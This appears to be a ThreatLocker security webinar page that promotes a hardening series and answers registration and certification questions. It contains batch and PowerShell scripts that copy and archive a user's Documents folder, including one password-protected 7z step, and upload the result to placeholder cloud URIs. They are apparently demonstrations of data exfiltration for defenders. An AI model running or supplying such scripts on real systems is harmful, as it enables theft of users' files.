This week’s session was packed with even more actionable strategies to help harden your environment.
(
echo My Music\
echo My Pictures\
echo My Videos\
echo My Documents\
echo Application Data\
echo Local Settings\
echo PrintHood\
echo NetHood\
echo Recent\
echo SendTo\
echo Start Menu\
echo Templates\
) > exclude.txt
xcopy "%USERPROFILE%\Documents" "%USERPROFILE%\Desktop\copy_of_documents" /E /I /H /Y /EXCLUDE:exclude.txt
del exclude.txt
tar -a -c -f "%USERPROFILE%\Desktop\copy_of_documents.zip" -C "%USERPROFILE%\Desktop" copy_of_documents
@echo off
REM Get the computer name
set "hostname=%COMPUTERNAME%"
REM Define the path to the ZIP file on the Desktop
set "filepath=%USERPROFILE%\Desktop\copy_of_documents.zip"
REM Check if the file exists
if not exist "%filepath%" (
echo File not found: %filepath%
pause
exit /b
)
REM Upload the file to the GCS bucket using the hostname as the folder name
REM Replace the following URL with your actual upload URL
set "Insert_URI_here"
REM Use curl to upload the file
curl -X POST -H "Content-Type: application/octet-stream" --data-binary "@%filepath%" "%upload_url%"
echo File 'copy_of_documents.zip' uploaded to folder '%hostname%' in Google Cloud Storage.
pauseFunction UploadFile {
Param([string]$path)
Process {
# Generate timestamp and file name
$timestamp = Get-Date -Format 'yyyy-MM-dd_HH-mm-ss'
$original = [System.IO.Path]::GetFileName($path)
$hostname = $env:COMPUTERNAME
$name = "$hostname/$timestamp`_$original"
# Check if a placeholder exists
$checkUri = "Insert_URI_here"
$checkResponse = Invoke-RestMethod -Uri $checkUri -Method Get
if (-not $checkResponse.items) {
$placeholderUri = "Insert_URI_here"
Invoke-RestMethod -Method Post -Uri $placeholderUri -ContentType 'application/octet-stream' -Body ([byte[]]@())
}
# Upload the actual file
$uploadUri = "Insert_URI_here"
Invoke-RestMethod -Method Post -Uri $uploadUri -ContentType 'application/octet-stream' -InFile $path
}
}
# Define the file path
$file = Join-Path ([Environment]::GetFolderPath('Desktop')) 'copy of documents (zipped).7z'
# Try uploading the file
try {
UploadFile -path $file
} catch {
Write-Error "Upload failed: $_"
}# Define paths
$zipUrl = "https://www.7-zip.org/a/7zr.exe"
$zipPath = "$env:USERPROFILE\Apps\7zip"
$sevenZip = "$zipPath\7zr.exe"
$original = "$env:USERPROFILE\Documents"
$tempCopy = "$env:USERPROFILE\Documents_Copy_For_Zip"
$out = "$env:USERPROFILE\Desktop\Copy of Documents (zipped).7z"
# Create 7-Zip directory if it doesn't exist
New-Item -ItemType Directory -Path $zipPath -Force | Out-Null
# Download 7zr.exe if not already present
if (-not (Test-Path $sevenZip)) {
Invoke-WebRequest -Uri $zipUrl -OutFile $sevenZip
}
# Add 7-Zip to PATH for this session
$env:PATH += ";$zipPath"
# Copy the original Documents folder to a temporary location
Copy-Item -Path $original -Destination $tempCopy -Recurse -Force
# Get all non-reparse (non-symlink) items in the copied folder
$items = Get-ChildItem -Path $tempCopy -Force -ErrorAction SilentlyContinue | Where-Object {
-not $_.Attributes.ToString().Contains("ReparsePoint")
}
# Compress each item in the copied folder
foreach ($item in $items) {
& $sevenZip a -t7z $out $item.FullName -ppw -mhe -snl
}
# Delete the temporary copy after successful archive
if (Test-Path $out) {
Remove-Item $tempCopy -Recurse -Force
} else {
Write-Host "Cannot find temp"
}This webinar series is designed to be as technology-agnostic as possible. You don’t need ThreatLocker to participate, but it certainly helps.
If you want to follow along more easily, we’d be happy to help you get started with a ThreatLocker agent. Just book a complimentary, no-obligation 30-minute session with a ThreatLocker Solutions Engineer.
Download the week 12 checklist on this page to keep up with key tasks and harden your environment step by step.
You can get caught up here.
We’ll see you in the week 13 webinar on Tuesday, August 5, 2025 at 8 a.m. PDT/ 11 a.m. EDT/ 4 p.m. BST!
Use the checklist below to get started on this week's tasks.
Missed the earlier segments of our webinar series? Don't worry: there's still time to catch up in time for next Tuesday's session! Register and learn all the details below.
Register now
There will be 15 webinars over the course of approximately 100 days, each approximately one hour long including an audience Q&A, airing live each Tuesday beginning May 13, 2025 at 8 a.m. PDT/ 11 a.m. EDT / 4 p.m. BST.
This series is for IT professionals ready to take control of their environment, whether you've just inherited one, are rebuilding from the ground up, or need to scale and secure what’s already in place.
No – you only have to register once, and we will automatically register you for all future webinars in the series! We’ll email you reminders before each one, and we’ll add them to your calendar via Zoom.
Once you register using the form on this page, you’ll get an email with the Zoom link that we’ll use for the live webinar.
Yes! We’ll get the recorded videos of each webinar up and running on this page as soon as possible after the live event.
No, the entire series, including the certification and badge that you earn upon completion, are completely free.
Yes! You will get a digital certificate of completion as well as a verified Credly badge that you can use on your LinkedIn, website, portfolio and any other accounts.
At the end of each live webinar, you’ll have the opportunity to ask any of our experts questions you may have in a weekly live Q&A – you won’t be able to participate in the pre-recorded version. Also, you will need to attend at least 12 of the 15 live webinars to receive the certificate of completion and verified Credly badge. Watching them later will not count toward your badge and certification.
Soon after the end of the 100 days series, you’ll receive an email from Credly with your unique code, badge and link for your socials.
You must attend a minimum of 12 live webinars out of the 15 to qualify for the Credly badge and official certificate of completion. However, anyone can watch any of the webinars at any time once they’re posted to the website!
Request your 30-day trial to the entire ThreatLocker platform today.
Try ThreatLocker
